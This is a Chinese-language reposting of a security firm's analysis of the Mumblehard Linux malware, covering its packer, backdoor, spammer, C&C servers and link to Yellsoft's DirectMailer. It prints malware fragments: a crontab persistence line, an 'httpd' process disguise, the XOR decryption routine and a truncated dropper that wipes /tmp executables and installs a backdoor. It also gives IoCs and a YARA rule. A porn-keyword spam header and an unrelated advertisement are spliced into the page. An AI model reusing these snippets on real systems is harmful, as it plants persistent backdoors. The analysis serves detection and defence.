日韩无码专区无码一级三级片|91人人爱网站中日韩无码电影|厨房大战丰满熟妇|AV高清无码在线免费观看|另类AV日韩少妇熟女|中文日本大黄一级黄色片|色情在线视频免费|亚洲成人特黄a片|黄片wwwav色图欧美|欧亚乱色一区二区三区

RELATEED CONSULTING
相關(guān)咨詢
選擇下列產(chǎn)品馬上在線溝通
服務(wù)時(shí)間:8:30-17:00
你可能遇到了下面的問題
關(guān)閉右側(cè)工具欄

新聞中心

這里有您想知道的互聯(lián)網(wǎng)營銷解決方案
深度分析惡意軟件Mumblehard

0x00 簡介

創(chuàng)新互聯(lián)專注為客戶提供全方位的互聯(lián)網(wǎng)綜合服務(wù),包含不限于網(wǎng)站建設(shè)、成都網(wǎng)站制作、哈密網(wǎng)絡(luò)推廣、微信小程序開發(fā)、哈密網(wǎng)絡(luò)營銷、哈密企業(yè)策劃、哈密品牌公關(guān)、搜索引擎seo、人物專訪、企業(yè)宣傳片、企業(yè)代運(yùn)營等,從售前售中售后,我們都將竭誠為您服務(wù),您的肯定,是我們最大的嘉獎(jiǎng);創(chuàng)新互聯(lián)為所有大學(xué)生創(chuàng)業(yè)者提供哈密建站搭建服務(wù),24小時(shí)服務(wù)熱線:18982081108,官方網(wǎng)址:www.cdcxhl.com

我們發(fā)現(xiàn)Linux/ Mumblehard的原因來自于某天某網(wǎng)管聯(lián)系我們,他的服務(wù)器因?yàn)椴粩喟l(fā)送垃圾郵件被列入了黑名單。我們dump了服務(wù)器上其中一個(gè)奇怪進(jìn)程的內(nèi)存,這玩意連接到了一個(gè)不同的SMTP服務(wù)器,并發(fā)送垃圾郵件。dump下來的內(nèi)存顯示這玩意是一個(gè),唔,perl解釋器,隨之我們在/tmp目錄發(fā)現(xiàn)了一個(gè)相關(guān)的可執(zhí)行文件,并且立即開始著手分析,為了方便我們給這玩意起名Mumblehard。

說實(shí)話我們對這玩意產(chǎn)生了極大的興趣,因?yàn)樵趷阂廛浖?,perl腳本被封裝在ELF可執(zhí)行文件中是很少見的,至少這玩意比起其他來說要更加復(fù)雜一些。另外一點(diǎn)是我們發(fā)現(xiàn)這款惡意軟件與一家叫Yellsoft的軟件公司存在很大的聯(lián)系,而第一個(gè)被發(fā)現(xiàn)的樣本在09年提交到VirusTotal。

Figure 1. Wayback Machine上顯示的Yellsoft主頁

我們對所發(fā)現(xiàn)已經(jīng)確認(rèn)遭到感染的系統(tǒng)進(jìn)行了調(diào)查,確認(rèn)了兩種可能的傳播方式,最常見的利用Joomla和Wordpress的exp進(jìn)行傳播,另外一種是通過分布式的后門,Yellsoft在他們主頁上銷售一種叫DirectMailer的軟件,240美刀,其中裝有特殊的后門。

這篇paper描述了惡意軟件中的組件的分析,以及我們對受害者的統(tǒng)計(jì)調(diào)查,還有那家神秘的Yellsoft。

0x01 惡意軟件分析

我們分析了兩種不同的惡意軟件組件,第一個(gè)是一個(gè)通用的后門,向C&C服務(wù)器請求一個(gè)命令,該命令包含一個(gè)網(wǎng)址,然后通過這個(gè)網(wǎng)址下載惡意文件并且執(zhí)行,第二個(gè)是一種多功能的垃圾郵件發(fā)送器的程序。這兩個(gè)組件都使用perl進(jìn)行編寫,然后使用一個(gè)匯編寫的特殊加殼器進(jìn)行混淆,最終隱藏到一個(gè)ELF格式的二進(jìn)制文件中。

下面的圖顯示了惡意軟件和C&C服務(wù)器之間的關(guān)系。

Figure 2. Linux/Mumblehard的交互

下面我們會(huì)先解析加殼器的細(xì)節(jié),然后在描述后門和郵件發(fā)送器的功能。

1.1 ELF二進(jìn)制中的perl殼

最初引起我們興趣的是惡意軟件的加殼器,簡單看看反匯編代碼,我們可以很明顯的看出,加殼器是直接使用匯編進(jìn)行編寫,整個(gè)加殼大約使用了200個(gè)匯編指令。這個(gè)觀察來源于兩個(gè)點(diǎn),一個(gè)是他們直接使用int 80指令進(jìn)行系統(tǒng)中斷,另一個(gè)是它們并不適用常見的方式進(jìn)行堆棧管理。

通過其系統(tǒng)調(diào)用的方式,可執(zhí)行文件可以避免任何的外部依賴,同時(shí),加殼器被確認(rèn)適用于linux和bsd系統(tǒng)。因?yàn)橄到y(tǒng)進(jìn)行了系統(tǒng)調(diào)用13,并傳入了參數(shù)0,該系統(tǒng)調(diào)用對應(yīng)到linux的時(shí)間,和BSD的標(biāo)準(zhǔn)輸入。在BSD上該調(diào)用失敗后會(huì)返回一個(gè)負(fù)數(shù)到eax上,而linux上會(huì)返回一個(gè)正數(shù)表示從1970年到今天過了幾秒。

Figure 3. system call 13

之后會(huì)fork()一個(gè)perl解釋器("/usr/bin/perl", ...)然后通過標(biāo)準(zhǔn)輸入將perl腳本發(fā)送給進(jìn)程。并且使用系統(tǒng)調(diào)用pipe和dup2來處理文件描述符。這一來父進(jìn)程就可以將解密后的perl腳本寫入解釋器。#p#

1.2 perl后門

后門實(shí)際上只有一個(gè)簡單的任務(wù),就是從C&C服務(wù)器上請求一條命令,并且返回其是否成功。不過后門并不會(huì)使用daemonize來進(jìn)行進(jìn)程守護(hù),他直接使用crontab來每15分鐘執(zhí)行一次。

 
 
 
 
    
  
  
  
  
  1. $ crontab -l  
    2. 
  
  
  
  
  2. */15 * * * * /var/tmp/qCVwOWA >/dev/null 2>&1 
    3.

 

并且還通過分配$0來將自己偽裝成httpd。

 
 
 
 
    
  
  
  
  
  1. $0 = "httpd"; 
    2.

 

每次運(yùn)行,后門都會(huì)向列表中的后門發(fā)送一條查詢請求命令,就算某臺(tái)已經(jīng)返回過有效的命令。

綜合來說該后門只支持一條命令:0x10下載并執(zhí)行。我們分析了手頭的樣本整理出了下面這樣的list,事實(shí)上,只有ip:194.54.81.163返回過命令,其他應(yīng)該都是掛掉了,比如,域名behance.net 在2005年被adobe收購。

? 184.106.208.157 ? 194.54.81.163 ? advseedpromoan.com ? 50.28.24.79 ? 67.221.183.105 ? seoratingonlyup.net ? advertise.com ? 195.242.70.4 ? pratioupstudios.org ? behance.net

1.2.1 C&C通信

Mumblehard使用http的get對每臺(tái)C&C服務(wù)器發(fā)送請求,將返回的命令隱藏在http響應(yīng)頭的Set-Cookie中,來逃避一些數(shù)據(jù)包的檢測。

一個(gè)請求的例子

123456789HTTP/1.0 200 OK

 
 
 
 
    
  
  
  
  
  1. HTTP/1.0 200 OK  
    2. 
  
  
  
  
  2. Date: Sat, 14 Feb 2015 23:01:57 GMT  
    3. 
  
  
  
  
  3. Server: Apache/1.3.41 (Unix)  
    4. 
  
  
  
  
  4. Set-Cookie: PHPSESSID=260518103c38332d35373729393e39253e3c3b207f66736577722861646b6c 
    5. 
  
  
  
  
  5. 697e217c647066603a7f66706363606f61; path=/  
    6. 
  
  
  
  
  6. Content-Length: 18  
    7. 
  
  
  
  
  7. Connection: close  
    8. 
  
  
  
  
  8. Content-Type: text/html  
    9. 
  
  
  
  
  9. under construction 
    10.

 

PHPSESSID cookie值進(jìn)行了hex進(jìn)行編碼,并且通過自定義的算法進(jìn)行加密,該加密算法與加殼器中用來加密perl腳本的算法是相同的.

Figure 4. 用匯編寫的加密算法

perl版加密

 
 
 
 
    
  
  
  
  
  1. sub xorl {  
    2. 
  
  
  
  
  2.  my ($line, $code, $xor, $lim) = (shift, "", 1, 16);  
    3. 
  
  
  
  
  3.  foreach my $chr (split (//, $line)) {  
    4. 
  
  
  
  
  4.   if ($xor == $lim) {  
    5. 
  
  
  
  
  5.     $lim = 0 if $lim == 256;  
    6. 
  
  
  
  
  6.     $lim += 16;  
    7. 
  
  
  
  
  7.     $xor = 1;  
    8. 
  
  
  
  
  8.   }  
    9. 
  
  
  
  
  9.   $code .= pack ("C", unpack ("C", $chr) ^ $xor);  
    10. 
  
  
  
  
  10.   $xor ++;  
    11. 
  
  
  
  
  11.  }  
    12. 
  
  
  
  
  12.  return $code;  
    13. 
  
  
  
  
    14.

 

一旦解密,下面的信息回從cookie中提取出來。 

   

這里有一個(gè)解密后的信息的例子。 

 

Mumblehard后門的user-agent

Mozilla/5.0 (Windows NT 6.1; rv:7.0.1) Gecko/20100101 Firefox/7.0.1

該user-agent被驗(yàn)證與windows7上Firefox 7.0.1的user-agent相同。不過在下載完成后,惡意軟件會(huì)向服務(wù)器發(fā)送請求報(bào)告是否下載了文件,該信息隱藏在user-agent中,格式大概是下面這個(gè)樣子

Mozilla/5.0 (Windows NT 6.1; rv:7.0.1) Gecko/
 .
 .
  Firefox/7.0.1

一個(gè)實(shí)際的例子

Mozilla/5.0 (Windows NT 6.1; rv:7.0.1) Gecko/24.200.56013 Firefox/7.0.1

#p#

1.3 perl惡意郵件發(fā)送器

該惡意軟件發(fā)送器也是perl寫的,并且加殼后嵌入elf可執(zhí)行文件,目的在于向C&C請求任務(wù),并且發(fā)送惡意郵件,Mumblehard支持大部分一個(gè)惡意郵件發(fā)送器會(huì)有的功能,模板,報(bào)表,SMTP執(zhí)行等,我們會(huì)將接下來的內(nèi)容限制在其中的一些獨(dú)特的功能和網(wǎng)絡(luò)協(xié)議等。

perl本身是兼容多個(gè)操作系統(tǒng)的,所以我們認(rèn)為該惡意軟件是針對多個(gè)類型的操作系統(tǒng)為目標(biāo),不過其中的EWOULDBLOCK和EINPROGRESS常量是不可移植的,盡管如此,該惡意軟件的常量還是可以兼容Linux, FreeBSD and Windows。目前我們抓到的樣本是無法在windows上運(yùn)行的,不過也可能表示針對windows平臺(tái)他們開發(fā)了不同類型的加殼器。

其中的perl

 
 
 
 
    
  
  
  
  
  1. if ( $^O eq "linux" ) { $ewblock = 11; $eiprogr = 115; }  
    2. 
  
  
  
  
  2. if ( $^O eq "freebsd" ) { $ewblock = 35; $eiprogr = 36; }  
    3. 
  
  
  
  
  3. if ( $^O eq "MSWin32" ) { $ewblock = 10035; $eiprogr = 10036; } 
    4.

 

這玩意有兩種方式發(fā)送惡意郵件,一種是請求C&C服務(wù)器上的一個(gè)任務(wù),第二種是開啟一個(gè)代理。

1.3.1 C&C通信

C&C服務(wù)器運(yùn)行在端口25上,惡意郵件發(fā)送器可以通過post請求發(fā)送二進(jìn)制數(shù)據(jù),內(nèi)容如下表 

 

不過這些數(shù)據(jù)似乎只在一種情況下會(huì)被使用,比如統(tǒng)計(jì)有多少服務(wù)器在發(fā)郵件啥的。它存在4個(gè)32位的整數(shù)頭。

任務(wù)的表示符

成功的郵件數(shù)目

網(wǎng)絡(luò)問題失敗的郵件數(shù)目

被SMTP服務(wù)器拒絕的郵件數(shù)目

惡意主機(jī)還可以自定義發(fā)送報(bào)告的詳細(xì)程度,其中有三個(gè)級別,最低的一級只有數(shù)字,中級包括電子郵件地址,最高一級包括成功或者失敗的原因。最初的請求,服務(wù)器會(huì)返回一個(gè)200的響應(yīng),包含設(shè)置,電子郵件列表,和垃圾郵件模版。 

 

 

1.3.2 代理功能的特點(diǎn)

我們分析的大多數(shù)的樣本中都包含一個(gè)通用的代理組件,工作原理很簡單,監(jiān)聽tcp端口的連接,并且發(fā)送通知,只有c&c服務(wù)器的連接允許連接到該端口,但是內(nèi)部有一個(gè)list,可以自定義添加允許的連接。不過其實(shí)只有兩條命令會(huì)被代理組件識(shí)別。

添加ip地址到允許列表

創(chuàng)建一個(gè)新的tcp隧道

下面是用作參考的協(xié)議內(nèi)容 

 在創(chuàng)建連接時(shí)候?qū)嶋H上使用的是通過SOCKS4協(xié)議進(jìn)行實(shí)現(xiàn),這個(gè)功能允許黑客傳輸任意的流量到服務(wù)器,不過蛋疼的是我們并沒有見該功能使用過,所以并無法斷定是用于什么。#p#

1.3.3 惡意郵件內(nèi)容

我們跟蹤了大量的惡意郵件,發(fā)現(xiàn)主要是用于推廣一些藥物產(chǎn)品,并且還有產(chǎn)品官方的鏈接,這里是其中一個(gè)例子。 

 

該惡意郵件的鏈接販賣解決性功能障礙的藥物的網(wǎng)站。 

 

具體網(wǎng)站為加拿大的spamtrackers.eu ,不過其消息頭貌似是使用隨機(jī)的詞。

Million-Explosively-Arrogance: B77FE821EAB1
Copes-Horribly: 881976c526e6
Formants-Carmichael-Cutlet: consistency
Interoffice-Gastronome-Unmodified: d41f7ebe89a

目前還不知道將其添加到反垃圾郵件簽名是否有效果,不過我們認(rèn)為是有的。

0x02 被感染主機(jī)的統(tǒng)計(jì)

其中惡意服務(wù)器支持的C&C域名其中一部分已經(jīng)失效,所以我們購買了其中的域名來監(jiān)控受到感染的服務(wù)器,我們使用了惡意軟件中用到的特殊的user-agent來進(jìn)行監(jiān)控。

下面是我們收集的2014年9月19日到2015年4月22日的數(shù)據(jù),大概存在8,867個(gè)ip進(jìn)行連接,其中大部分是用于網(wǎng)站托管的服務(wù)器。 

 

(此處省略部分關(guān)于統(tǒng)計(jì)的細(xì)節(jié))

0x03 WHO IS YELLSOFT?

樣本中的C&C服務(wù)器的ip范圍位于 194.54.81.162 到194.54.81.164

194.54.81.162:53 Hardcoded DNS server in Mumblehard’s spammer
194.54.81.163:54321 Report from Mumblehard’s proxy is open
194.54.81.163:25 C&C server for Mumblehard’s spammer
194.54.81.164:25 C&C server for Mumblehard’s spammer

如果你檢查下面的兩個(gè)ip,你會(huì)發(fā)現(xiàn)他們都是194.54.81.165和194.54.81.166的名稱服務(wù)器,其中yellsoft.net web服務(wù)器托管 在194.54.81.166,其中162到166的ip的ns和soa都是相同的,這可以表明,這5個(gè)ip都是托管在同一臺(tái)服務(wù)器上。

 
 
 
 
    
  
  
  
  
  1. $ dig +short -x 194.54.81 SOA | uniq -c   
    2. 
  
  
  
  
  2. 1 ns1.rx-name.net. hostmaster.81.54.194.in-addr.arpa. 2015031209 28800 7200 604800 86400  
    3. 
  
  
  
  
  3. $ for i in 2 3 4 5 6; do dig +short -x 194.54.81 SOA @194.54.81.16$i; done | uniq -c   
    4. 
  
  
  
  
  4. 5 ns1.yellsoft.net. support.yellsoft.net. 2013051501 600 300 604800 600 
    5.

 

那么Yellsoft是干嘛的,他們銷售一種perl編寫的批量郵件發(fā)送工具,叫DirectMailer。運(yùn)行在UNIX系統(tǒng)上。 

 #p#

3.1 DirectMailer分析

其主頁上告訴訪客,他們不提供直接下載,下載地址被托管在narod.ru上,我們可以從上面得到副本。在2014年我們下載了一個(gè)叫 directmailer-retail.zip 的壓縮包,之后ESET講其識(shí)別為惡意軟件后,該軟件就不再被放置于softexp.narod.ru上。

zip包含一個(gè)dm.pl 文件,不過其為elf可執(zhí)行文件,打包了各種perl腳本。在主程序啟動(dòng)之前,程序會(huì)調(diào)用一個(gè)bdrp的函數(shù),該函數(shù)有一個(gè)uuencoded編碼的blob,解碼運(yùn)行后會(huì)生成另一個(gè)ELF可執(zhí)行文件,包含一個(gè)加殼后的perl腳本,它會(huì)被寫入文件系統(tǒng)和cron 15分鐘運(yùn)行一次。很熟悉是不?

bdrp函數(shù)

 
 
 
 
    
  
  
  
  
  1. sub bdrp {  
    2. 
  
  
  
  
  2.   my $bdrp = <<'BDRPDATA';  
    3. 
  
  
  
  
  3.   M?T5,1@$!`0D```````````(``P`!````3(`$""P``````````````#0`(``!  
    4. 
  
  
  
  
  4.   M``````````"`!`@`@`0("1H``!X>```'`````!```(DE"9H$"+@-````,=M3  
    5. 
  
  
  
  
  5.   ...  
    6. 
  
  
  
  
  6.   M)S5I=6=\9&(Z-WQT>'-T?#,@/'YR<%-$`@=,1$A#1$P1"U$-7$I$1$!=#Q5+  
    7. 
  
  
  
  
  7.   %%T491S$`  
    8. 
  
  
  
  
  8.   BDRPDATA  
    9. 
  
  
  
  
  9.   $bdrp = unpack( "u*", $bdrp );  
    10. 
  
  
  
  
  10.     foreach my $bdrpp ( "/var/tmp", "/tmp" ) {  
    11. 
  
  
  
  
  11.     # Delete all executable files in temporary directory  
    12. 
  
  
  
  
  12.     # (delete existing Mumblehard installation)  
    13. 
  
  
  
  
  13.     for (<$bdrpp/*>) { unlink $_ if ( -f $_ && ( -x $_ || -X $_ ) ); }  
    14. 
  
  
  
  
  14.     # Create random file name  
    15. 
  
  
  
  
  15.     my $bdrpn = [ "a" .. "z", "A" .. "Z" ];  
    16. 
  
  
  
  
  16.     $bdrpn = join( "",  
    17. 
  
  
  
  
  17.     @$bdrpn[ map { rand @$bdrpn } ( 1 .. ( 6 + int rand 5 ) ) ] );  
    18. 
  
  
  
  
  18.     my $bdrpb = "$bdrpp/$bdrpn";  
    19. 
  
  
  
  
  19.     my $bdrpc = $bdrpb . int rand 9;  
    20. 
  
  
  
  
  20.     # crontab job to add (runs every 15 minutes)  
    21. 
  
  
  
  
  21.     my $bdrpt = "*/15 * * * * $bdrpb >/dev/null 2>&1\n";  
    22. 
  
  
  
  
  22.     if ( open( B, ">", $bdrpb ) ) {  
    23. 
  
  
  
  
  23.     # Drop file and install job with crontab  
    24. 
  
  
  
  
  24.     [...]  
    25. 
  
  
  
  
  25.     }  
    26. 
  
  
  
  
  26.   }  
    27. 
  
  
  
  
    28.

0x04 結(jié)論

惡意軟件正在變的越來越復(fù)雜,另一個(gè)令人擔(dān)憂的是Mumblehard的運(yùn)營這么多年一直沒中斷過。

附錄A

UDP packets to

? 194.54.81.162 port 53

TCP connections to

? 194.54.81.163 port 80 (backdoor)
? 194.54.81.163 port 54321 (proxy)
? 194.54.81.163 port 25 (spammer)
? 194.54.81.164 port 25 (spammer)

HTTP requests with the following User-Agent pattern

? Mozilla/5.0 (Windows NT 6.1; rv:7.0.1) Gecko/<1 or more digits>.
<1 ormore digits>.<1 or more digits> Firefox/7.0.1

yara rule

 
 
 
 
    
  
  
  
  
  1. rule mumblehard_packer  
    2. 
  
  
  
  
  2. {  
    3. 
  
  
  
  
  3. meta:  
    4. 
  
  
  
  
  4.  description = "Mumblehard i386 assembly code responsible for decrypting Perl  
    5. 
  
  
  
  
  5. code"  
    6. 
  
  
  
  
  6.  author = "Marc-Etienne M.Léveillé" 
    7. 
  
  
  
  
  7.  date = "2015-04-07" 
    8. 
  
  
  
  
  8.  reference = "http://www.welivesecurity.com" 
    9. 
  
  
  
  
  9.  version = "1" 
    10. 
  
  
  
  
  10. strings:  
    11. 
  
  
  
  
  11.  $decrypt = { 31 db [1-10] ba ?? 00 00 00 [0-6] (56 5f | 89 F7)  
    12. 
  
  
  
  
  12.  39 d3 75 13 81 fa ?? 00 00 00 75 02 31 d2 81 c2 ?? 00 00  
    13. 
  
  
  
  
  13.  00 31 db 43 ac 30 d8 aa 43 e2 e2 }  
    14. 
  
  
  
  
  14. condition:  
    15. 
  
  
  
  
  15.  $decrypt  
    16. 
  
  
  
  
    17.

文章名稱:深度分析惡意軟件Mumblehard
網(wǎng)頁鏈接:http://www.5511xx.com/article/coosjjo.html